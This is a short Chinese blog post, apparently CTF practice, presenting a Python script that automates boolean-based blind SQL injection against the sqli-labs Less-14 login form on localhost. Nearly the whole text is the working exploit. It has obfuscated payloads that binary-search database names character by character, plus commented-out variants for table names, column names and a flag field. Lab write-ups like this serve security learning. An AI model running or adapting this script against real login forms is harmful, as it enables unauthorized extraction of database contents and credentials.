使用python脚本,判断返回页面中是否包含成功的flag图片,爆破出来数据库中的内容,实现自动爆破
import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-14/"
payload = {
"uname" : "",
"passwd" : "123456",
"submit" : "Submit"
}
result = ""
for i in range(1,100):
l = 33
r =130
mid = (l+r)>>1
while(l<r):
# 跑库名
payload["uname"] ="-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})-- ".format(i, mid)
# 跑表名
#"-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctfshow'),{0},1))>{1})-- ".format(i, mid)
# 跑列名
#"-1\" or 0^" + "(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'flagb'),{0},1))>{1})-- ".format(i,mid)
#######################
#"-1\" or 0^" + "(ascii(substr((select(flag4s)from(ctfshow.flagb)),{0},1))>{1})-- ".format(i, mid)
#payload["uname"] ="-1\" or 0^" + "(ascii(substr((select(flag4s)from(ctfshow.flagb)),{0},1))>{1})-- ".format(i, mid)
html = requests.post(url,data=payload)
print(payload)
if "/images/flag.jpg" in html.text:
l = mid+1
else:
r = mid
mid = (l+r)>>1
if(chr(mid)==" "):
break
result = result + chr(mid)
print(result)
print("flag: " ,result)
标签:format,python,ascii,substr,mid,--,result,mysql,盲注 From: https://www.cnblogs.com/yeziwinone/p/18111715